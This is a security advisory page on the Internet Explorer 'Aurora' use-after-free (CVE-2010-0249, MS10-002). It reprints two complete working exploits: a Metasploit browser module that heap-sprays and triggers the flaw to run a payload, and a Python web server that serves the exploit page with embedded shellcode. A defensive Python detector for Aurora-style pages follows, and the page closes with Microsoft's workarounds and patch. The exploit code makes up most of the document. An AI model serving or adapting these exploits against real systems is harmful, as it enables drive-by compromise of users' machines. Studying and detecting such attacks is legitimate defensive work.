Security Research

Security Vulnerabilities
Microsoft IE Invalid Event Handling Memory Corruption Vulnerability (MS10-002)

Release date: 2010-01-14
Updated: 2010-01-21

Affected systems:
Microsoft Internet Explorer 8.0
Microsoft Internet Explorer 7.0
Microsoft Internet Explorer 6.0 SP1
Microsoft Internet Explorer 6.0
Description:
BUGTRAQ ID: 37815
CVE ID: CVE-2010-0249

Microsoft IE is the web browser bundled with the Microsoft Windows operating system.

IE contains a memory corruption vulnerability in its handling of invalid event operations. Because the reference count is not incremented after an object is created, a malicious sequence of object operations can leave a pointer referring to memory that is reused after being freed. A remote attacker could exploit this by luring a user to a malicious web page and, through the resulting invalid memory access, execute arbitrary code on the user's system.

This is a 0-day vulnerability confirmed to affect IE 6/7/8. It has already been used to attack the networks of several large companies, and now that technical details and working exploit code are public it is very likely to be used in drive-by download (web trojan) attacks. Microsoft has published a security advisory with temporary workarounds but has not yet provided a patch; taking the measures recommended in the workarounds is strongly advised.

<*Source: Microsoft
  
  Links: http://blogs.technet.com/msrc/archive/2010/01/14/security-advisory-979352.aspx
        http://secunia.com/advisories/38209/
        http://www.kb.cert.org/vuls/id/492515
        http://extraexploit.blogspot.com/2010/01/iexplorer-0day-cve-2010-0249.html
        http://blogs.technet.com/msrc/archive/2010/01/17/further-insight-into-security-advisory-979352-and-the-threat-landscape.aspx
        http://www.microsoft.com/technet/security/bulletin/ms10-002.mspx?pf=true
        http://www.us-cert.gov/cas/techalerts/TA10-021A.html
*>

Test method:

Warning

The following program (method) may be offensive in nature and is provided solely for security research and educational purposes. Users assume all risk!

##
# $Id: ie_aurora.rb 8140 2010-01-16 01:00:01Z egypt $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
    Rank = NormalRanking

    include Msf::Exploit::Remote::HttpServer::HTML
    include Msf::Exploit::Remote::BrowserAutopwn
    autopwn_info({
        :ua_name    => HttpClients::IE,
        :ua_minver  => "6.0",
        :ua_maxver  => "8.0",
        :javascript => true,
        :os_name    => OperatingSystems::WINDOWS,
        :vuln_test  => nil, # no way to test without just trying it
    })


    def initialize(info = {})
        super(update_info(info,
            'Name'           => 'Microsoft Internet Explorer "Aurora" Memory Corruption',
            'Description'    => %q{
                This module exploits a memory corruption flaw in Internet Explorer. This
            flaw was found in the wild and was a key component of the "Operation Aurora"
            attacks that lead to the compromise of a number of high profile companies. The
            exploit code is a direct port of the public sample published to the Wepawet
            malware analysis site. The technique used by this module is currently identical
            to the public sample, as such, only Internet Explorer 6 can be reliably exploited.
            },
            'License'        => MSF_LICENSE,
            'Author'         =>
                [
                    'unknown',
                    'hdm'      # Metasploit port
                ],
            'Version'        => '$Revision: 8140 $',
            'References'     =>
                [
                    ['CVE', '2010-0249'],
                    ['OSVDB', '61697'],
                    ['URL', 'http://www.microsoft.com/technet/security/advisory/979352.mspx'],
                    ['URL', 'http://wepawet.iseclab.org/view.php?hash=1aea206aa64ebeabb07237f1e2230d0f&type=js']

                ],
            'DefaultOptions' =>
                {
                    'EXITFUNC' => 'process',
                },
            'Payload'        =>
                {
                    'Space'    => 1000,
                    'BadChars' => "\x00",
                    'Compat'   =>
                        {
                            'ConnectionType' => '-find',
                        },
                    'StackAdjustment' => -3500,
                },
            'Platform'       => 'win',
            'Targets'        =>
                [
                    [ 'Automatic', { }],
                ],
            'DisclosureDate' => 'Jan 14 2010', # wepawet sample; matches the 2010-01-14 advisory date
            'DefaultTarget'  => 0))
    end

    def on_request_uri(cli, request)

        if (request.uri.match(/\.gif/i))
            data = "R0lGODlhAQABAIAAAAAAAAAAACH5BAEAAAAALAAAAAABAAEAAAICRAEAOw==".unpack("m*")[0]
            send_response(cli, data, { 'Content-Type' => 'image/gif' })
            return
        end

        var_memory    = rand_text_alpha(rand(100) + 1)
        var_boom      = rand_text_alpha(rand(100) + 1)
        var_x1        = rand_text_alpha(rand(100) + 1)
        var_e1        = rand_text_alpha(rand(100) + 1)
        var_e2        = rand_text_alpha(rand(100) + 1)

        var_comment   = rand_text_alpha(rand(100) + 1)
        var_abc       = rand_text_alpha(3)

        var_ev1       = rand_text_alpha(rand(100) + 1)
        var_ev2       = rand_text_alpha(rand(100) + 1)
        var_sp1       = rand_text_alpha(rand(100) + 1)

        var_unescape  = rand_text_alpha(rand(100) + 1)
        var_shellcode = rand_text_alpha(rand(100) + 1)
        var_spray     = rand_text_alpha(rand(100) + 1)
        var_start     = rand_text_alpha(rand(100) + 1)
        var_i         = rand_text_alpha(rand(100) + 1)

        rand_html     = rand_text_english(rand(400) + 500)

        html = %Q|<html>
<head>
<script>

    var #{var_comment} = "COMMENT";

    var #{var_x1} = new Array();
    for (i = 0; i < 200; i ++ ){
       #{var_x1}[i] = document.createElement(#{var_comment});
       #{var_x1}[i].data = "#{var_abc}";
    };

    var #{var_e1} = null;

    var #{var_memory} = new Array();
    var #{var_unescape} = unescape;

    function #{var_boom}() {

        var #{var_shellcode} = #{var_unescape}( '#{Rex::Text.to_unescape(regenerate_payload(cli).encoded)}');

        var #{var_spray} = #{var_unescape}( "%" + "u" + "0" + "c" + "0" + "d" + "%u" + "0" + "c" + "0" + "d" );

        do { #{var_spray} += #{var_spray} } while( #{var_spray}.length < 0xd0000 );

        for(#{var_i} = 0; #{var_i} < 150; #{var_i}++) #{var_memory}[#{var_i}] = #{var_spray} + #{var_shellcode};
    }

    function #{var_ev1}(evt){
        #{var_boom}();
        #{var_e1} = document.createEventObject(evt);
        document.getElementById("#{var_sp1}").innerHTML = "";
        window.setInterval(#{var_ev2}, 50);
    }

    function #{var_ev2}(){
      // single JS literal, split with + so the string stays valid across lines
      p = "\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d" +
          "\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d" +
          "\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d";
      for (i = 0; i < #{var_x1}.length; i ++ ){
          #{var_x1}[i].data = p;
      }

      var t = #{var_e1}.srcElement;
    }
</script>
</head>
<body>

<span id="#{var_sp1}"><img src="#{get_resource}#{var_start}.gif" onload="#{var_ev1}(event)"></span>

</body>
</html>
        |

        print_status("Sending #{self.name} to client #{cli.peerhost}")
        # Transmit the compressed response to the client
        send_response(cli, html, { 'Content-Type' => 'text/html', 'Pragma' => 'no-cache' })

        # Handle the payload
        handler(cli)
    end
end

http://www.exploit-db.com/exploits/11167

# Title: Internet Explorer Aurora Exploit
# EDB-ID: 11167
# CVE-ID: (CVE-2010-0249)
# Author: Ahmed Obied
# Published: 2010-01-17
# Verified: yes
#
#   Author : Ahmed Obied ([email protected])
#
#   This program acts as a web server that generates an exploit to
#   target a vulnerability (CVE-2010-0249) in Internet Explorer.
#   The exploit was tested using Internet Explorer 6 on Windows XP SP2.
#   The exploit's payload spawns the calculator.
#
#   Usage  : python ie_aurora.py [port number]
#   Note   : written for Python 2 (print statements, BaseHTTPServer module)
#
import sys
import socket

from BaseHTTPServer import HTTPServer, BaseHTTPRequestHandler
        
class RequestHandler(BaseHTTPRequestHandler):

    def convert_to_utf16(self, payload):
        enc_payload = ''
        for i in range(0, len(payload), 2):
            num = 0
            for j in range(0, 2):
                num += (ord(payload[i + j]) & 0xff) << (j * 8)
            enc_payload += '%%u%04x' % num
        return enc_payload
                
    def get_payload(self):
        # win32_exec - EXITFUNC=process CMD=calc.exe Size=164 Encoder=PexFnstenvSub
        # http://metasploit.com
        payload  = '\x31\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73'
        payload += '\x13\x6f\x02\xb1\x0e\x83\xeb\xfc\xe2\xf4\x93\xea\xf5\x0e'
        payload += '\x6f\x02\x3a\x4b\x53\x89\xcd\x0b\x17\x03\x5e\x85\x20\x1a'
        payload += '\x3a\x51\x4f\x03\x5a\x47\xe4\x36\x3a\x0f\x81\x33\x71\x97'
        payload += '\xc3\x86\x71\x7a\x68\xc3\x7b\x03\x6e\xc0\x5a\xfa\x54\x56'
        payload += '\x95\x0a\x1a\xe7\x3a\x51\x4b\x03\x5a\x68\xe4\x0e\xfa\x85'
        payload += '\x30\x1e\xb0\xe5\xe4\x1e\x3a\x0f\x84\x8b\xed\x2a\x6b\xc1'
        payload += '\x80\xce\x0b\x89\xf1\x3e\xea\xc2\xc9\x02\xe4\x42\xbd\x85'
        payload += '\x1f\x1e\x1c\x85\x07\x0a\x5a\x07\xe4\x82\x01\x0e\x6f\x02'
        payload += '\x3a\x66\x53\x5d\x80\xf8\x0f\x54\x38\xf6\xec\xc2\xca\x5e'
        payload += '\x07\x7c\x69\xec\x1c\x6a\x29\xf0\xe5\x0c\xe6\xf1\x88\x61'
        payload += '\xd0\x62\x0c\x2c\xd4\x76\x0a\x02\xb1\x0e'
        return self.convert_to_utf16(payload)
    
    def get_exploit(self):
        exploit = '''
        <html>
        <head>
            <script>
            
            var obj, event_obj;
            
            function spray_heap()
            {
                var chunk_size, payload, nopsled;
            
                chunk_size = 0x80000;
                payload = unescape("<PAYLOAD>");
                nopsled = unescape("<NOP>");
                while (nopsled.length < chunk_size)
                    nopsled += nopsled;
                nopsled_len = chunk_size - (payload.length + 20);      
                nopsled = nopsled.substring(0, nopsled_len);
                heap_chunks = new Array();
                for (var i = 0 ; i < 200 ; i++)
                    heap_chunks[i] = nopsled + payload;
            }
        
            function initialize()
            {
                obj = new Array();
                event_obj = null;
                for (var i = 0; i < 200 ; i++ )
                    obj[i] = document.createElement("COMMENT");
            }
        
            function ev1(evt)
            {
                event_obj = document.createEventObject(evt);
                document.getElementById("sp1").innerHTML = "";
                window.setInterval(ev2, 1);
            }
      
            function ev2()
            {
                var data, tmp;
                
                data = "";
                tmp = unescape("%u0a0a%u0a0a");
                for (var i = 0 ; i < 4 ; i++)
                    data += tmp;
                for (i = 0 ; i < obj.length ; i++ ) {
                    obj[i].data = data;
                }
                event_obj.srcElement;
            }
                    
            function check()
            {
                if (navigator.userAgent.indexOf("MSIE") == -1)
                    return false;
                return true;  
            }
            
            if (check()) {
                initialize();
                spray_heap();              
            }
            else
                window.location = 'about:blank'
                
            </script>
        </head>
        <body>
            <span id="sp1">
            <img src="aurora.gif" onload="ev1(event)">
            </span>      
        </body>
        </html>
        '''
        exploit = exploit.replace('<PAYLOAD>', self.get_payload())
        exploit = exploit.replace('<NOP>', '%u0a0a%u0a0a')
        return exploit

    def get_image(self):
        content  = '\x47\x49\x46\x38\x39\x61\x01\x00\x01\x00\x80\x00\x00\xff\xff\xff'
        content += '\x00\x00\x00\x2c\x00\x00\x00\x00\x01\x00\x01\x00\x00\x02\x02\x44'
        content += '\x01\x00\x3b'
        return content

    def log_request(self, *args, **kwargs):
        pass
        
    def do_GET(self):
        try:
            if self.path == '/':
                print
                print '[-] Incoming connection from %s' % self.client_address[0]
                self.send_response(200)
                self.send_header('Content-Type', 'text/html')
                self.end_headers()
                print '[-] Sending exploit to %s ...' % self.client_address[0]
                self.wfile.write(self.get_exploit())
                print '[-] Exploit sent to %s' % self.client_address[0]
            elif self.path == '/aurora.gif':    
                self.send_response(200)
                self.send_header('Content-Type', 'image/gif')
                self.end_headers()
                self.wfile.write(self.get_image())
        except:
            print '[*] Error : an error has occurred while serving the HTTP request'
            print '[-] Exiting ...'
            sys.exit(-1)
            
                        
def main():
    if len(sys.argv) != 2:
        print 'Usage: %s [port number (between 1024 and 65535)]' % sys.argv[0]
        sys.exit(0)
    try:
        port = int(sys.argv[1])
        if port < 1024 or port > 65535:
            raise ValueError
        try:
            serv = HTTPServer(('', port), RequestHandler)
            ip = socket.gethostbyname(socket.gethostname())
            print '[-] Web server is running at http://%s:%d/' % (ip, port)
            try:
                serv.serve_forever()
            except:
                print '[-] Exiting ...'
        except socket.error:
            print '[*] Error : a socket error has occurred'
        sys.exit(-1)  
    except ValueError:
        print '[*] Error : an invalid port number was given'
        sys.exit(-1)
            
if __name__ == '__main__':
    main()
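As an added example that is not part of this advisory or of either exploit listing above, the following Python 3 script scores served HTML for the combination of features both listings rely on: the createEventObject / innerHTML = "" / srcElement use-after-free trigger, a repeated %uXXXX or \uXXXX unit grown in a loop (the heap spray), and the bulk rewrite of COMMENT node data. The two sample pages, the heuristic names and the threshold are constructed for illustration.

```python
import re

# Heuristics taken from the two CVE-2010-0249 listings above. Scores are a
# constructed triage aid for proxy or sandbox captures, not a signature of record.
UAF_TRIGGER = {
    "createEventObject": re.compile(r"createEventObject\s*\("),
    "innerHTML-cleared": re.compile(r'\.innerHTML\s*=\s*(["\'])\1'),   # element freed
    "srcElement-reuse":  re.compile(r"\.srcElement\b"),                # freed element touched
}
# Same 16-bit unit repeated back to back, in %uXXXX or \uXXXX form (sled unit).
SPRAY_SLED = re.compile(r"(?:%u|\\u)([0-9a-fA-F]{4})(?:%u|\\u)\1")
# Sled doubled in a loop until it reaches a large hex size (0x80000 / 0xd0000 above).
SPRAY_GROW = re.compile(r"\.length\s*<\s*0x[0-9a-fA-F]{4,}")
# Bulk rewrite of node .data, used above to refill the freed allocation.
NODE_DATA_REWRITE = re.compile(r"\]\s*\.data\s*=")


def score_html(html):
    """Return (score, matched_heuristic_names) for one served HTML document."""
    hits = [name for name, pat in UAF_TRIGGER.items() if pat.search(html)]
    if SPRAY_SLED.search(html) and SPRAY_GROW.search(html):
        hits.append("heap-spray")
    if NODE_DATA_REWRITE.search(html):
        hits.append("node-data-rewrite")
    return len(hits), hits


def is_aurora_like(html, threshold=4):
    """Flag when most of the trigger chain and the spray occur together."""
    return score_html(html)[0] >= threshold


# Constructed samples: a condensed Aurora-style page and a benign page that
# also clears innerHTML on a timer (a common, harmless pattern).
AURORA_SAMPLE = """<script>
var obj = new Array(); for (var i = 0; i < 200; i++) obj[i] = document.createElement("COMMENT");
function spray() { var s = unescape("%u0a0a%u0a0a"); while (s.length < 0x80000) s += s; }
function ev1(evt) { e = document.createEventObject(evt);
  document.getElementById("sp1").innerHTML = ""; window.setInterval(ev2, 1); }
function ev2() { for (i = 0; i < obj.length; i++) obj[i].data = "x"; e.srcElement; }
</script><span id="sp1"><img src="a.gif" onload="ev1(event)"></span>"""

BENIGN_SAMPLE = """<script>
function clearBox() { document.getElementById("box").innerHTML = ""; }
window.setInterval(clearBox, 1000);
</script><div id="box">hello</div>"""

if __name__ == "__main__":
    for label, page in (("aurora", AURORA_SAMPLE), ("benign", BENIGN_SAMPLE)):
        print(label, score_html(page), "flagged" if is_aurora_like(page) else "clean")
```

The Metasploit module randomises identifiers, so the heuristics deliberately key on DOM calls and literal shapes rather than on names like ev1 or sp1.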

Recommendations:
Temporary workarounds:

* Enable DEP for Internet Explorer 6 SP2 or Internet Explorer 7.

  Microsoft provides an automated tool that enables DEP for IE 6/7; download it from:
  http://go.microsoft.com/?linkid=9668626

* Configure Internet Explorer to prompt before running ActiveX controls and Active Scripting in the Internet and Local intranet security zones.
* Set the Internet and Local intranet security zone levels to "High" so that a prompt is shown before ActiveX controls and Active Scripting run in these zones.

Vendor patch:

Microsoft
---------
Microsoft has released a security bulletin (MS10-002) and the corresponding patch:
MS10-002: Cumulative Security Update for Internet Explorer (978207)
Link: http://www.microsoft.com/technet/security/bulletin/ms10-002.mspx?pf=true

This vulnerability entry was translated and compiled by NSFOCUS (綠盟科技). All rights reserved; reproduction without permission is prohibited.